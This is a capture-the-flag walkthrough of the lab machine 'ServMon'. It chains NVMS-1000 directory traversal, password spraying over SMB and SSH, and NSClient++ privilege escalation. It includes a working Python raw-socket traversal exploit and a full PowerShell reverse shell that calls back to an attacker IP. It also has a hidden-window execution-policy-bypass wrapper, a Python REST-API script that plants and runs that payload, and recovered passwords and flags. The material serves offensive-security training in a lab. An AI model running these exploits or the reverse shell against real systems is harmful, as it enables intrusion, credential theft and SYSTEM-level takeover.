ServMon

Rustscan

rustscan --ulimit 5000 -a 10.129.227.77 -- -sV -sC

FTP

ftp anonymous@10.129.227.77

Anonymous login is allowed; two user directories are present, each holding a single text file:

Nadine
Nathan

Nadine Share – Confidential.txt

Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it 
yourself and place it back into the secure folder.

Regards

Nadine

Nathan Share – Notes to do.txt

Notes to do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Searching for NVMS-1000 (the web application running on the host) turns up a Python exploit script, NVMS1000-Exploit, for its directory traversal, CVE-2019-20085.

The host is vulnerable: a GET whose path climbs out of the web root with ../ sequences returns arbitrary files from the drive.

The Passwords.txt that Nadine's note refers to is read via ../../../../../../../../users/nathan/desktop/passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
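What the traversal exploit actually sends, as an added example (this is not the NVMS1000-Exploit script the writeup refers to). CVE-2019-20085 is a plain directory traversal in the NVMS-1000 web server, so the whole exploit is one GET whose path climbs out of the web root. The catch a practitioner runs into is that most HTTP clients (curl without --path-as-is among them) collapse ../ segments before the request leaves the machine, which silently defeats the attack; the request is therefore assembled by hand and written to a raw socket. The host and port are the writeup's target; the traversal depth of eight is what the writeup used.

```python
import socket

# Added example, not the writeup's or the NVMS1000-Exploit author's code.
# Host/port are the writeup's target; port 80 for NVMS-1000 is an assumption.
TARGET_HOST = "10.129.227.77"
TARGET_PORT = 80


def traversal_path(target: str, depth: int = 8) -> str:
    """Request path: <depth> '../' segments then a path relative to the drive
    root, e.g. 'users/nathan/desktop/passwords.txt'. Backslashes are accepted
    and turned into forward slashes; a leading separator is dropped."""
    return "/" + "../" * depth + target.lstrip("/\\").replace("\\", "/")


def build_request(target: str, host: str = TARGET_HOST, depth: int = 8) -> bytes:
    """Raw HTTP/1.1 GET as bytes, so no client-side URL normaliser can
    remove the dot segments that make the traversal work."""
    return (
        f"GET {traversal_path(target, depth)} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def split_response(raw: bytes):
    """Return (status_code, body) from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    return int(status_line.split()[1]), body


def fetch(target: str, host: str = TARGET_HOST, port: int = TARGET_PORT,
          timeout: float = 5.0):
    """Send the traversal request over a raw socket and return (status, body).
    A 200 with content means the file was read from outside the web root."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(target, host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return split_response(b"".join(chunks))


if __name__ == "__main__":
    # windows/win.ini is the usual harmless proof before going for the real file.
    for path in ("windows/win.ini", "users/nathan/desktop/passwords.txt"):
        code, body = fetch(path)
        print(f"[{code}] {path}")
        if code == 200:
            print(body.decode(errors="replace"))
```

The same request can be reproduced with curl only if --path-as-is is given; without it curl rewrites the path to /users/nathan/desktop/passwords.txt and the server answers for a file that does not exist under the web root.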

Netexec

Spraying the recovered passwords over SMB (a single user, the file supplied as the password list) finds one working pair:

netexec smb 10.129.227.77 -u nadine -p passwords.txt

- ServMon\nadine:L1k3B1gBut7s@W0rk
Share enumeration with the working credentials:

smbmap -u 'nadine' -p "L1k3B1gBut7s@W0rk" -H 10.129.227.77

SSH

SSH as nadine (the same password works for SSH):

ssh nadine@10.129.227.77
L1k3B1gBut7s@W0rk

User Flag


sb109fddcc69dba6ff8b27b73bb90e5f5

Enumeration

NSClient++ is installed and its configuration file, nsclient.ini (default install path C:\Program Files\NSClient++), is readable as nadine and holds the web-interface password. The web interface on port 8443 only accepts connections from the host itself, which matches Nathan's "Lock down the NSClient Access" item, so it has to be reached through a port forward. Privilege escalation follows ExploitDB 46802 (NSClient++ 0.5.2.35 - Privilege Escalation).

NSClient++ web password: ew2x6SsGTxjRwXOT

# Wrapper .bat (the external script NSClient++ will run; NSClient++ cannot run a .ps1 directly, hence the wrapper)

powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file "c:\temp\reverse.ps1"

# reverse.ps1 - upload it to c:\temp over the nadine SSH session; $LHOST/$LPORT are the attacker's listener

$LHOST = "10.10.14.118"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData - 1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

Forward local port 8443 to 127.0.0.1:8443 on the target through the SSH session as nadine (ssh -L), then browse to https://localhost:8443 and log in with the password from nsclient.ini.

1. Settings > Settings > scripts > Add new
2. Section: /settings/external scripts/scripts/powershell
3. Key: command
4. Value: the full path of the .bat wrapper above (e.g. c:\temp\reverse.bat); pointing it at the .ps1 itself does not execute the script
5. Save the change
6. Control > Reload
7. Queries > powershell (the last component of the section path is the query name)
8. Start the netcat listener on the $LPORT from reverse.ps1 (9001), then Run; the script executes as the NSClient++ service account (LocalSystem by default), so the shell that calls back is SYSTEM
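The same privilege escalation driven through the NSClient++ REST API instead of the web-UI clicks, as an added example (not the writeup's code and not ExploitDB 46802). NSClient++ 0.5.2 documents PUT /api/v1/scripts/ext/scripts/<file> for adding an external script and GET /api/v1/queries/<name>/commands/execute for running it; whether a given build registers the uploaded file under its name without the extension is an assumption, so the code falls back to the full file name on a 404. The URL, password and reverse.ps1 path are the writeup's values; the script name check_reverse and the built-in "admin" basic-auth user are assumptions.

```python
import base64
import ssl
import sys
import urllib.error
import urllib.request

# Added example, not the writeup's code. Same eight steps as the web UI
# procedure, through the documented NSClient++ 0.5.2 REST endpoints.
NSC_URL = "https://127.0.0.1:8443"   # the web port, reached over the SSH port forward
NSC_PASSWORD = "ew2x6SsGTxjRwXOT"    # from nsclient.ini
SCRIPT_NAME = "check_reverse"        # assumed name for the new external script
PS1_PATH = r"c:\temp\reverse.ps1"    # reverse.ps1 already uploaded to the target


def bat_body(ps1_path: str) -> str:
    """The same wrapper as the writeup's .bat, with CRLF line endings."""
    return (
        "@echo off\r\n"
        "powershell.exe -executionpolicy bypass -windowstyle hidden "
        f'-noninteractive -nologo -file "{ps1_path}"\r\n'
    )


def auth_headers(password: str) -> dict:
    """HTTP basic auth as the built-in 'admin' user (assumed), plus the
    'password' header that older NSClient++ API calls use; the server
    ignores whichever one it does not need."""
    token = base64.b64encode(f"admin:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}", "password": password}


def script_paths(name: str) -> tuple:
    """(upload path, execute path) for an external script called <name>.bat."""
    return (
        f"/api/v1/scripts/ext/scripts/{name}.bat",
        f"/api/v1/queries/{name}/commands/execute",
    )


def _call(method: str, path: str, body: bytes = None, timeout: float = 30) -> tuple:
    """Return (status, text); status None means the request did not complete."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE      # NSClient++ ships a self-signed certificate
    req = urllib.request.Request(NSC_URL + path, data=body, method=method,
                                 headers=auth_headers(NSC_PASSWORD))
    if body is not None:
        req.add_header("Content-Type", "text/plain")
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")
    except OSError as e:                  # connection refused, timeout, TLS errors
        return None, str(e)


def exploit() -> None:
    upload, execute = script_paths(SCRIPT_NAME)
    code, text = _call("PUT", upload, bat_body(PS1_PATH).encode())
    print(f"[upload] {code} {text.strip()}")
    if code != 200:
        sys.exit("script upload failed; check the password and that 8443 is forwarded")
    # Have the netcat listener up before this point: the query blocks while
    # the reverse shell holds the script open, so a timeout here is normal.
    code, text = _call("GET", execute, timeout=15)
    if code == 404:   # query name assumption was wrong; try the full file name
        code, text = _call("GET", execute.replace(SCRIPT_NAME, SCRIPT_NAME + ".bat"),
                           timeout=15)
    print(f"[execute] {code} {text.strip()}")


if __name__ == "__main__":
    exploit()
```

Whichever route is used, the external script is subject to the NSClient++ external-script timeout (60 seconds by default under /settings/external scripts); if the SYSTEM shell dies after about a minute, raise that value in the settings before reloading, or have the wrapper hand the payload off so the wrapper itself returns quickly.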

Root.txt

8ab637b9bd6d7848f602532cdb57d9cd